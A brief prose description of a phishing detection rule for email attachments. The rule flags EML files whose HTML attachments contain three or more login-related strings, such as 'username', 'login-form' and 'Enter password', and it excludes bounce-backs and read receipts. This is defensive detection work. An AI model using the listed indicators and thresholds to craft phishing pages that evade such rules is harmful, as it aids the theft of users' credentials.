This threat detection rule identifies potential credential phishing attempts through EML files that contain HTML attachments. The rule excludes irrelevant emails like bounce backs and read receipts by filtering out specific sender addresses and subject lines. It focuses on the presence of suspicious strings related to login functionalities within JavaScript and HTML content. A threshold of three matching indicators (e.g., 'username', 'login-form', 'email-form') in JavaScript or three indicators in the HTML body is set for detecting potential threats. Additionally, known phishing obfuscation techniques and user prompts such as 'Enter password' are accounted for. Overall, this rule leverages multiple methods of analysis including content, file, header, and JavaScript analysis to flag potentially malicious email attachments.